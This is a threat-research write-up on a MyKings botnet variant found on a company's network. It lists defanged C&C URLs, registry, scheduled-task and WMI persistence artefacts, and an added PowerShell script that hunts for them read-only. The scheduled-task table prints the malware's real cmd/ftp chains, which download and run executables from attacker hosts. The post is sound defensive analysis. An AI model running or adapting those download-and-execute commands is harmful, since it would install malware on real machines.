# Uncovering a MyKings Variant With Bootloader Persistence via Managed Detection and Response

by Miguel Ang, Erika Mendoza and Buddy Tancio

In May, during the Managed Detection and Response service onboarding process of an electronics company in the Asia-Pacific region, we noticed suspicious activity via the Trend Micro Deep Discovery Inspector that turned out to be related to EternalBlue, an exploit perhaps more popularly known for its use in the WannaCry attacks. After the discovery, we sent our first alert to the company regarding the possible threat.

A few days later, we found evidence of communication from one of the company’s machines to the following URLs (which we confirmed to be infection vectors):

• hxxp://js[.]mykings.top:280/v[.]sct
• hxxp://js[.]mykings.top:280/helloworld[.]msi

The URLs contained the word “mykings,” which was similar to the command-and-control (C&C) servers that were used in our previous analysis of the botnet in August 2017. This gave us the first clues as to what the threat was.

Furthermore, we found changes to the machine’s system registry that were being used as a persistence mechanism. These registry values were responsible for the C&C callbacks to the URLs mentioned earlier:

• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value name "start"
• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value name "start1"
• HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg, value name "start"
• HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg, value name "start1"

Digging deeper, we found that the entries were added in 2017, indicating that the malware variant had been hiding in the company’s system for roughly 2 years before it was discovered. This presents an additional challenge since timing is important in determining MyKings’ actual payload. A large number of the botnet’s components, including references to the C&C server and the download URLs, are accessible online only for a short time and, therefore, are highly volatile. Unlike infections that start with embedded URLs and files, MyKings is tied together by scripts that simply download everything it needs from remote servers.

Figure 1. The registry entries that were added in 2017

During the forensic investigation, we also identified several other persistence mechanisms consistent with our previous research in 2017. Aside from the autorun registry entries, we also observed scheduled tasks and Windows Management Instrumentation (WMI) objects (see Tables 1 and 2):

| Task name | Launch string |
|---|---|
| Mysa | `cmd /c echo open down[.]mysking[.]info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe"}` |
| Mysa1 | `rundll32.exe c:\windows\debug\item.dat` |
| Mysa2 | `cmd /c echo open ftp[.]ftp0118[.]info>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p"}` |
| Mysa3 | `cmd /c echo open ftp[.]ftp0118[.]info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe"}` |
| ok | `rundll32.exe c:\windows\debug\ok.dat` |

Table 1. Scheduled tasks and corresponding launch strings

| WMI object | Remarks |
|---|---|
| `__EventConsumer` | Name: `fuckyoumm2_consumer` (code snippet for the EventConsumer) |
| `__EventFilter` | Name: `fuckyoumm2_filter`; Query: `select * from __timerevent where timerid="fuckyoumm2_itimer"` |
| `__FilterToConsumerBinding` | Consumer=`\\.\root\subscription:ActiveScriptEventConsumer.Name="fuckyoumm2_consumer"`, Filter=`\\.\root\subscription:__EventFilter.Name="fuckyoumm2_filter"` |

Table 2. WMI objects and relevant details
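As an added example that is not part of this post and not Trend Micro tooling, the following PowerShell performs a read-only hunt on a Windows host for the three persistence layers described above: the Run and MSConfig startupreg values, the scheduled-task names and launch strings in Table 1, and the fuckyoumm2 WMI filter, consumer and binding in Table 2. It goes slightly beyond the exact names by also flagging any autorun value, task action or WMI query/script whose text contains one of the hostnames or file names the post lists; that indicator list, the function names and the output format are assumptions made for this example.

```powershell
# Added example (not from the Trend Micro post): read-only hunt for the MyKings
# persistence artefacts described in the post. Run in an elevated Windows
# PowerShell 5.1 session; nothing is modified or deleted, findings are reported.

$RunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg'
)
$ValueNames   = @('start', 'start1')                 # autorun value names from the post
$TaskNames    = @('Mysa', 'Mysa1', 'Mysa2', 'Mysa3', 'ok')   # Table 1
$WmiNameMatch = 'fuckyoumm2'                         # Table 2 filter/consumer names
# Hostnames and dropped-file names taken from the post (assumed indicator list)
$Indicators   = @('mykings.top', 'mysking.info', 'ftp0118.info',
                  'item.dat', 'ok.dat', 'lsmosee.exe', 'helloworld.msi')
# Pseudo-properties PowerShell adds to registry objects; not real values
$PsMeta = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')

function Test-Indicator([string]$Text) {
    foreach ($i in $Indicators) { if ($Text -like "*$i*") { return $true } }
    return $false
}

function New-Finding($Type, $Location, $Detail) {
    [pscustomobject]@{ Type = $Type; Location = $Location; Detail = $Detail }
}

function Find-MyKingsPersistence {
    $findings = @()

    # 1. Autorun registry values: the exact value names seen in the incident,
    #    plus any other value whose data references a known indicator.
    foreach ($key in $RunKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        foreach ($p in $props.PSObject.Properties) {
            if ($PsMeta -contains $p.Name) { continue }
            if ($ValueNames -contains $p.Name -or (Test-Indicator "$($p.Value)")) {
                $findings += New-Finding 'Registry' "$key\$($p.Name)" "$($p.Value)"
            }
        }
        # MSConfig\startupreg normally stores one subkey per item with a 'command' value
        foreach ($sub in (Get-ChildItem $key -ErrorAction SilentlyContinue)) {
            $cmd = (Get-ItemProperty $sub.PSPath -ErrorAction SilentlyContinue).command
            if ($ValueNames -contains $sub.PSChildName -or (Test-Indicator "$cmd")) {
                $findings += New-Finding 'Registry' $sub.Name "$cmd"
            }
        }
    }

    # 2. Scheduled tasks: known task names, or any action whose command line
    #    contains an indicator (e.g. the ftp -s:<file> download chains).
    foreach ($t in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        $cmd = ($t.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join ' ; '
        if ($TaskNames -contains $t.TaskName -or (Test-Indicator $cmd)) {
            $findings += New-Finding 'ScheduledTask' "$($t.TaskPath)$($t.TaskName)" $cmd
        }
    }

    # 3. Permanent WMI event subscriptions in root\subscription.
    $ns = 'root\subscription'
    foreach ($f in (Get-WmiObject -Namespace $ns -Class __EventFilter -ErrorAction SilentlyContinue)) {
        if ($f.Name -like "*$WmiNameMatch*" -or (Test-Indicator $f.Query)) {
            $findings += New-Finding 'WMI __EventFilter' $f.Name $f.Query
        }
    }
    foreach ($c in (Get-WmiObject -Namespace $ns -Class __EventConsumer -ErrorAction SilentlyContinue)) {
        # ActiveScriptEventConsumer keeps its script in ScriptText,
        # CommandLineEventConsumer in CommandLineTemplate; others have no body.
        $body = if ($c.ScriptText) { $c.ScriptText }
                elseif ($c.CommandLineTemplate) { $c.CommandLineTemplate }
                else { '' }
        if ($c.Name -like "*$WmiNameMatch*" -or (Test-Indicator $body)) {
            $findings += New-Finding "WMI $($c.__CLASS)" $c.Name $body
        }
    }
    foreach ($b in (Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding -ErrorAction SilentlyContinue)) {
        $pair = "Filter=$($b.Filter) Consumer=$($b.Consumer)"
        if ($pair -like "*$WmiNameMatch*") {
            $findings += New-Finding 'WMI __FilterToConsumerBinding' $pair ''
        }
    }

    return $findings
}

$results = Find-MyKingsPersistence
if ($results) { $results | Format-Table -AutoSize -Wrap }
else { 'No MyKings persistence artefacts found in Run keys, scheduled tasks or WMI subscriptions.' }
```

Get-ScheduledTask requires Windows 8 / Server 2012 or later; on older hosts `schtasks /query /v /fo csv` gives the same task names and actions. Any ActiveScriptEventConsumer in root\subscription is rare on a production host, so a broader hunt can report every such consumer rather than only names matching the fuckyoumm2 pattern.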

Our analysis revealed that the variant retains its basic infrastructure. However, there were some interesting additions, which we discuss in detail in the technical analysis section.